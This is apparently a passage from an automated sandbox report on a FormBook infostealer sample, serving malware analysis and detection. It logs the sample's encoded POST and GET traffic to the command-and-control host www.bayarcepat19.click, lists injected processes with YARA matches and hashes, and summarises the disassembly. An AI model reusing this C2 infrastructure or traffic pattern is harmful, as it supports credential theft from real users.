                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gffSJQXggBPncFzNL6zI1bM8Kchy8cMSa797D0G9KWpVkWls%2FiSKL3Ur0L5Ae8dooI4r3IaPgXjA8kz4og6wF48Lf5t%2B2X4FxHJxmVdDkMs49wcTUPeSYt7KEsS6D2SPkr9V7HRgeOhV"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Vary: Accept-Encoding
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8cb5b0cb7cf1185d-EWR
                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          35192.168.2.549747188.114.96.3801220C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Sep 30, 2024 18:46:44.614772081 CEST1858OUTPOST /5hcm/ HTTP/1.1
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Host: www.bayarcepat19.click
                                                                                          Origin: http://www.bayarcepat19.click
                                                                                          Referer: http://www.bayarcepat19.click/5hcm/
                                                                                          Content-Length: 1244
                                                                                          Cache-Control: max-age=0
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Connection: close
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
                                                                                          Data Raw: 67 48 43 58 6d 44 55 3d 67 4e 66 45 44 55 76 67 50 72 79 7a 56 30 61 4d 65 6c 78 51 45 4b 4c 50 52 4d 74 4a 76 33 6e 44 46 33 61 30 4d 6e 73 59 76 4e 4c 72 4b 6c 64 57 46 7a 62 43 33 70 71 6e 51 44 46 63 46 47 6a 44 52 44 6f 38 51 44 6e 4e 5a 61 31 58 55 6f 77 44 70 36 74 42 75 55 4e 6b 73 70 36 6c 53 69 65 5a 59 75 75 45 31 68 43 44 30 38 63 73 69 2f 48 58 52 46 51 79 4d 4c 35 46 64 2b 73 73 2f 2b 4e 4b 67 46 73 76 75 4a 7a 2b 54 77 51 4f 76 67 48 61 44 34 6d 42 2b 75 65 72 46 65 64 32 48 56 32 61 5a 44 6a 2b 2b 63 2f 78 62 34 4a 69 63 78 48 6b 44 2f 71 68 75 73 39 54 39 47 61 39 43 51 62 36 52 71 59 57 6f 57 6e 7a 52 51 79 57 77 44 65 48 6b 43 70 65 46 63 56 30 47 55 79 41 55 61 70 6a 77 33 44 54 53 2f 31 44 52 5a 49 65 42 62 35 55 45 77 6c 4d 4b 2f 53 32 53 31 36 62 6f 57 4f 5a 32 4e 55 48 41 54 7a 73 4c 52 76 31 33 5a 54 71 63 62 70 71 54 72 77 6b 43 46 6b 63 5a 5a 6b 6b 75 6a 53 32 2f 73 68 38 76 36 31 32 53 31 50 59 47 56 4d 4b 5a 58 44 41 6a 67 56 35 55 6e 4b 6e 61 79 4e 56 7a 62 4a 64 76 36 [TRUNCATED]
                                                                                          Data Ascii: gHCXmDU=gNfEDUvgPryzV0aMelxQEKLPRMtJv3nDF3a0MnsYvNLrKldWFzbC3pqnQDFcFGjDRDo8QDnNZa1XUowDp6tBuUNksp6lSieZYuuE1hCD08csi/HXRFQyML5Fd+ss/+NKgFsvuJz+TwQOvgHaD4mB+uerFed2HV2aZDj++c/xb4JicxHkD/qhus9T9Ga9CQb6RqYWoWnzRQyWwDeHkCpeFcV0GUyAUapjw3DTS/1DRZIeBb5UEwlMK/S2S16boWOZ2NUHATzsLRv13ZTqcbpqTrwkCFkcZZkkujS2/sh8v612S1PYGVMKZXDAjgV5UnKnayNVzbJdv6dW/wjdk0fZ9IAdYjjo3iEDcDpy8wOl7MMJ5LlkOvIdTd0Uxfr9iizpzybM7YDXLa4k9a4caGZ35FAyY6IG4oNwXAMAvf5qtjrhImex7x8aY+bIubF+m3FfN5JboXMUgCLF4BaQnL5xeS9mUYebJ0CaSfL5SVPDNMXO0hVL6e7oPEMM8NTiTGeWukwavg85LvQJEwdEzo3sWzvuJFDk7dKln0o81nl7CdTr8O4MWw4nw6DrcKilhh2hSk1R1zFKS1lY23GSumXofKuHnfTve9qL3dUw1wlLBSLIX5mPkIBLveokFyvyfwcZ44rvT6f6i8qrSZQavTcxAvTXh/NyPKIMR9ez1jELVxvrVzwjNCDdsiFmN7mHfOa0VNHgE42EpI8T81QG/CUdqK33hKkXXhHIyzpKbj/skAtX3U1iieFa5a0aXsR2BT41sZEULstLKfWvnIMJr9Yl5gq/lALH1+d04Rxzk/CQnZWTcLtMWUige4vLlXncTfkAGNJ+kZACc2QcG7Wm7C9F8RclgF1YyLakKZzJIYFORp9Q5nY1bKObRZ4yxqXU2SMrK5x+WPoRD8nivRiuJ1yTT+IqIgyCzd+v9yPL6a3w0LP17QFZAH0b+ccANh0rDg7cDA9+AbIS05wJWCf1NmMhwoXKxT6l4gmWdk5Anq5jV2oC [TRUNCATED]
                                                                                          Sep 30, 2024 18:46:45.068811893 CEST836INHTTP/1.1 301 Moved Permanently
                                                                                          Date: Mon, 30 Sep 2024 16:46:45 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 167
                                                                                          Connection: close
                                                                                          Cache-Control: max-age=3600
                                                                                          Expires: Mon, 30 Sep 2024 17:46:45 GMT
                                                                                          Location: https://www.bayarcepat19.click/5hcm/
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=99%2B0wr8Pxq2PaYcgURBvqBEwH7UiumnZvILB%2BS%2BH8eOpstQKpNzsIaPAV4Xb%2FgaymfNMdDsG610%2Fg2hx1y3J0L%2FhsrChrDDni%2Fs6JStms9LJiX02qgYbFic48ZzcjSl7wfTgQX3%2F%2BMrp"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Vary: Accept-Encoding
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8cb5b0db5a20437b-EWR
                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          36192.168.2.549748188.114.96.3801220C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Sep 30, 2024 18:46:47.186758995 CEST549OUTGET /5hcm/?gHCXmDU=tP3kAkfnE7i1YCC3akJDPtDOQtMjgFa5K3aSOloco8KmCG1xGxL66P/sVWpGfWTMdHJkfi3yOYhNMZMhorUklSdDj9q9dz65TNSy5hy/ttZPgJetaDNmb5haRLwL+/pH9A==&Gh9=g8u8 HTTP/1.1
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Host: www.bayarcepat19.click
                                                                                          Connection: close
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
                                                                                          Sep 30, 2024 18:46:47.677134037 CEST990INHTTP/1.1 301 Moved Permanently
                                                                                          Date: Mon, 30 Sep 2024 16:46:47 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 167
                                                                                          Connection: close
                                                                                          Cache-Control: max-age=3600
                                                                                          Expires: Mon, 30 Sep 2024 17:46:47 GMT
                                                                                          Location: https://www.bayarcepat19.click/5hcm/?gHCXmDU=tP3kAkfnE7i1YCC3akJDPtDOQtMjgFa5K3aSOloco8KmCG1xGxL66P/sVWpGfWTMdHJkfi3yOYhNMZMhorUklSdDj9q9dz65TNSy5hy/ttZPgJetaDNmb5haRLwL+/pH9A==&Gh9=g8u8
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sYoNeshvfmLpNrgMiy7WTtvz8cDsz8BPsyJovy68djl6Al6Wle7EaqNHDaB1uZzgIoErvC9jcWeDhV5crnjrCPPGKqOMLKqKaCDPStxdEJBJi6x4tQ2EoR3tqQmIfztC46zFM%2B0ta2j5"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Speculation-Rules: "/cdn-cgi/speculation"
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8cb5b0eb8bb34340-EWR
                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                                          Statistics

                                                                                          CPU Usage

                                                                                          Click to jump to process

                                                                                          Memory Usage

                                                                                          Click to jump to process

                                                                                          High Level Behavior Distribution

                                                                                          Click to dive into process behavior distribution

                                                                                          Behavior

                                                                                          Click to jump to process

                                                                                          System Behavior

                                                                                          General

                                                                                          Target ID:0
                                                                                          Start time:12:43:44
                                                                                          Start date:30/09/2024
                                                                                          Path:C:\Users\user\Desktop\update SOA.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Users\user\Desktop\update SOA.exe"
                                                                                          Imagebase:0x400000
                                                                                          File size:1'401'959 bytes
                                                                                          MD5 hash:309A3F5CA72FF071A0EDD351EB3C6691
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:low
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:2
                                                                                          Start time:12:43:48
                                                                                          Start date:30/09/2024
                                                                                          Path:C:\Windows\SysWOW64\svchost.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Users\user\Desktop\update SOA.exe"
                                                                                          Imagebase:0xa70000
                                                                                          File size:46'504 bytes
                                                                                          MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2343330383.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2343330383.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2343906085.0000000006650000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2343906085.0000000006650000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2343594491.0000000003790000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2343594491.0000000003790000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:4
                                                                                          Start time:12:44:08
                                                                                          Start date:30/09/2024
                                                                                          Path:C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe"
                                                                                          Imagebase:0x4c0000
                                                                                          File size:140'800 bytes
                                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3883839683.0000000005350000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.3883839683.0000000005350000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                          Reputation:high
                                                                                          Has exited:false

                                                                                          General

                                                                                          Target ID:5
                                                                                          Start time:12:44:10
                                                                                          Start date:30/09/2024
                                                                                          Path:C:\Windows\SysWOW64\notepad.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Windows\SysWOW64\notepad.exe"
                                                                                          Imagebase:0x630000
                                                                                          File size:165'888 bytes
                                                                                          MD5 hash:E92D3A824A0578A50D2DD81B5060145F
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3882344624.0000000002B80000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3882344624.0000000002B80000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3883738653.0000000004A30000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3883738653.0000000004A30000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3883798608.0000000004A80000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3883798608.0000000004A80000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                          Reputation:moderate
                                                                                          Has exited:false

                                                                                          General

                                                                                          Target ID:6
                                                                                          Start time:12:44:23
                                                                                          Start date:30/09/2024
                                                                                          Path:C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe"
                                                                                          Imagebase:0x4c0000
                                                                                          File size:140'800 bytes
                                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3886044229.00000000054F0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3886044229.00000000054F0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                          Reputation:high
                                                                                          Has exited:false

                                                                                          General

                                                                                          Target ID:9
                                                                                          Start time:12:44:35
                                                                                          Start date:30/09/2024
                                                                                          Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                          Imagebase:0x7ff79f9e0000
                                                                                          File size:676'768 bytes
                                                                                          MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Disassembly

                                                                                          Reset < >

                                                                                            Execution Graph

                                                                                            Execution Coverage:1.4%
                                                                                            Dynamic/Decrypted Code Coverage:4.7%
                                                                                            Signature Coverage:7.9%
                                                                                            Total number of Nodes:127
                                                                                            Total number of Limit Nodes:9
                                                                                            execution_graph 80665 42fa43 80668 42e823 80665->80668 80671 42cad3 80668->80671 80670 42e83c 80672 42caf0 80671->80672 80673 42cb01 RtlFreeHeap 80672->80673 80673->80670 80674 42e903 80677 42ca83 80674->80677 80676 42e91e 80678 42ca9d 80677->80678 80679 42caae RtlAllocateHeap 80678->80679 80679->80676 80680 424ae3 80681 424aff 80680->80681 80682 424b27 80681->80682 80683 424b3b 80681->80683 80684 42c753 NtClose 80682->80684 80690 42c753 80683->80690 80686 424b30 80684->80686 80687 424b44 80693 42e943 RtlAllocateHeap 80687->80693 80689 424b4f 80691 42c770 80690->80691 80692 42c781 NtClose 80691->80692 80692->80687 80693->80689 80788 424e73 80789 424e8c 80788->80789 80790 424ed7 80789->80790 80793 424f17 80789->80793 80795 424f1c 80789->80795 80791 42e823 RtlFreeHeap 80790->80791 80792 424ee7 80791->80792 80794 42e823 RtlFreeHeap 80793->80794 80794->80795 80796 42bd13 80797 42bd30 80796->80797 80800 3a72df0 LdrInitializeThunk 80797->80800 80798 42bd58 80800->80798 80801 428ad3 80802 428b38 80801->80802 80803 428b73 80802->80803 80806 418c33 80802->80806 80805 428b55 80807 418c1b 80806->80807 80808 418bed 80806->80808 80807->80805 80809 42cb23 ExitProcess 80808->80809 80810 418c5d 80808->80810 80809->80807 80810->80810 80694 4140c3 80695 4140dd 80694->80695 80700 417883 80695->80700 80697 4140fb 80698 414140 80697->80698 80699 41412f PostThreadMessageW 80697->80699 80699->80698 80701 4178a7 80700->80701 80702 4178e3 LdrLoadDll 80701->80702 80703 4178ae 80701->80703 80702->80703 80703->80697 80811 41b3f3 80812 41b437 80811->80812 80813 41b458 80812->80813 80814 42c753 NtClose 80812->80814 80814->80813 80815 411af3 80816 411b08 80815->80816 80817 42c753 NtClose 80816->80817 80818 411b21 80817->80818 80704 3a72b60 LdrInitializeThunk 80819 418e38 80820 42c753 NtClose 80819->80820 80821 418e42 80820->80821 80705 401aaf 80706 401abc 80705->80706 80706->80706 80709 42feb3 80706->80709 80712 42e3d3 80709->80712 80713 42e3f9 80712->80713 80724 407563 80713->80724 80715 42e40f 80723 401c24 80715->80723 80727 41b203 80715->80727 80717 42e443 80738 4283e3 80717->80738 80718 42e42e 80718->80717 80742 42cb23 80718->80742 80721 42e45d 80722 42cb23 ExitProcess 80721->80722 80722->80723 80745 416543 80724->80745 80726 407570 80726->80715 80728 41b22f 80727->80728 80763 41b0f3 80728->80763 80731 41b274 80734 41b290 80731->80734 80736 42c753 NtClose 80731->80736 80732 41b25c 80733 41b267 80732->80733 80735 42c753 NtClose 80732->80735 80733->80718 80734->80718 80735->80733 80737 41b286 80736->80737 80737->80718 80739 428444 80738->80739 80740 428451 80739->80740 80774 4186e3 80739->80774 80740->80721 80743 42cb40 80742->80743 80744 42cb51 ExitProcess 80743->80744 80744->80717 80746 416560 80745->80746 80748 416579 80746->80748 80749 42d1a3 80746->80749 80748->80726 80751 42d1bd 80749->80751 80750 42d1ec 80750->80748 80751->80750 80756 42bd63 80751->80756 80754 42e823 RtlFreeHeap 80755 42d265 80754->80755 80755->80748 80757 42bd80 80756->80757 80760 3a72c0a 80757->80760 80758 42bdac 80758->80754 80761 3a72c11 80760->80761 80762 3a72c1f LdrInitializeThunk 80760->80762 80761->80758 80762->80758 80764 41b10d 80763->80764 80768 41b1e9 80763->80768 80769 42be03 80764->80769 80767 42c753 NtClose 80767->80768 80768->80731 80768->80732 80770 42be1d 80769->80770 80773 3a735c0 LdrInitializeThunk 80770->80773 80771 41b1dd 80771->80767 80773->80771 80776 4186f5 80774->80776 80775 418c1b 80775->80740 80776->80775 80782 413d43 80776->80782 80778 41883a 80778->80775 80779 42e823 RtlFreeHeap 80778->80779 80780 418852 80779->80780 80780->80775 80781 42cb23 ExitProcess 80780->80781 80781->80775 80786 413d63 80782->80786 80784 413dcc 80784->80778 80785 413dc2 80785->80778 80786->80784 80787 41b513 RtlFreeHeap LdrInitializeThunk 80786->80787 80787->80785

                                                                                            Executed Functions

                                                                                            Function 004186E3 Relevance: 2.9, Strings: 2, Instructions: 437COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 55 4186e3-418757 call 42e8c3 * 3 call 404b23 call 424483 67 418c26-418c2a 55->67 68 41875d-418787 call 42e873 55->68 71 418792 68->71 72 418789-418790 68->72 73 418794-41879e 71->73 72->73 74 4187a0 73->74 75 4187bf-4187d1 call 4244b3 73->75 76 4187a3-4187a6 74->76 82 418c24-418c25 75->82 83 4187d7-4187ef call 42e223 75->83 78 4187a8-4187ab 76->78 79 4187af-4187b9 76->79 78->76 81 4187ad 78->81 79->75 81->75 82->67 83->82 87 4187f5-418845 call 413d43 83->87 87->82 90 41884b-41886b call 42e823 87->90 93 41886d-41886f 90->93 94 41889c-41889e 90->94 95 418871-41887f call 42dd93 call 4070b3 93->95 96 4188a7-4188c9 call 41b2a3 93->96 94->96 97 4188a0 94->97 104 418884-418889 95->104 96->82 103 4188cf-4188f1 call 42bf33 96->103 97->96 106 4188f6-4188fb 103->106 104->94 107 41888b-41889a 104->107 106->82 108 418901-418978 call 42b8d3 call 42b983 call 42e873 106->108 107->108 115 418981 108->115 116 41897a-41897f 108->116 117 418983-4189b3 115->117 116->117 118 418a95 117->118 119 4189b9-4189bf 117->119 120 418a97-418a9e 118->120 121 4189c1-4189c4 119->121 122 4189d0-4189f1 call 42e873 119->122 124 418aa3-418aa7 120->124 121->119 123 4189c6-4189cb 121->123 129 4189f3-4189fb 122->129 130 4189fd 122->130 123->120 127 418aa9-418aab 124->127 128 418aad-418ab1 124->128 127->128 131 418ab3-418ac7 127->131 128->124 132 418a00-418a15 129->132 130->132 133 418ac9-418acf 131->133 134 418b38-418b88 call 417803 * 2 call 42e843 131->134 135 418a17 132->135 136 418a28-418a69 call 417783 call 42e873 132->136 138 418ad3-418ad8 133->138 166 418b8a-418b8e 134->166 167 418bad-418bb2 134->167 139 418a1a-418a1d 135->139 161 418a72 136->161 162 418a6b-418a70 136->162 142 418ada-418add 138->142 143 418aef-418af3 138->143 145 418a26 139->145 146 418a1f-418a22 139->146 142->143 149 418adf-418ae1 142->149 143->138 144 418af5-418af7 143->144 144->134 150 418af9-418b02 144->150 145->136 146->139 151 418a24 146->151 149->143 154 418ae3-418ae6 149->154 155 418b04-418b07 150->155 151->136 154->143 158 418ae8 154->158 159 418b32-418b36 155->159 160 418b09-418b0c 155->160 158->143 159->134 159->155 160->159 165 418b0e-418b10 160->165 164 418a74-418a93 call 414c93 161->164 162->164 164->120 165->159 172 418b12-418b15 165->172 168 418b90-418ba1 call 407123 166->168 169 418bba-418bc4 call 42bae3 166->169 167->169 171 418bb4 167->171 177 418ba6-418bab 168->177 178 418bc9-418bcc 169->178 171->169 172->159 176 418b17-418b30 172->176 176->159 177->167 179 418bd3-418be8 call 41b473 177->179 178->179 182 418bea-418c16 call 417783 * 2 call 42cb23 179->182 189 418c1b-418c1e 182->189 189->82
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343330383.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: N$N
                                                                                            • API String ID: 0-3855217897
                                                                                            • Opcode ID: f89fcfe8a7ec95ac77d6ae59a2586a5e641ab157a24ead25490e3025b2df80e4
                                                                                            • Instruction ID: 846e345c178b5d6c4a693780b6a168f8e8536fe6faccb3424975541efa0ef6ab
                                                                                            • Opcode Fuzzy Hash: f89fcfe8a7ec95ac77d6ae59a2586a5e641ab157a24ead25490e3025b2df80e4
                                                                                            • Instruction Fuzzy Hash: E4F192B0E00219AFDB24DF94CC81BEEB779EF44304F14819EE515A7241DB786A85CFA9
                                                                                            Function 00417883 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 213 417883-41789f 214 4178a7-4178ac 213->214 215 4178a2 call 42f523 213->215 216 4178b2-4178c0 call 42fb23 214->216 217 4178ae-4178b1 214->217 215->214 221 4178d0-4178e1 call 42dea3 216->221 222 4178c2-4178cd call 42fdc3 216->222 227 4178e3-4178f7 LdrLoadDll 221->227 228 4178fa-4178fd 221->228 222->221 227->228
                                                                                            APIs
                                                                                            • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004178F5
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343330383.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Load
                                                                                            • String ID:
                                                                                            • API String ID: 2234796835-0
                                                                                            • Opcode ID: e5c4bbe89f40af0726b0f43d48a7e7614d557be38eb8230b4c9e55b121e15b07
                                                                                            • Instruction ID: a0c37dff0129ecde4e604a7e5538e5a43d5b941f9cb87f3eacc9c9c84b095d1c
                                                                                            • Opcode Fuzzy Hash: e5c4bbe89f40af0726b0f43d48a7e7614d557be38eb8230b4c9e55b121e15b07
                                                                                            • Instruction Fuzzy Hash: 7E011EB5E0020DBBDF10EAE5DC46FDEB7789B54308F4081AAE90897241F635EB58CB95
                                                                                            Function 0042C753 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 239 42c753-42c78f call 4048e3 call 42d993 NtClose
                                                                                            APIs
                                                                                            • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C78A
                                                                                            Memory Dump Source
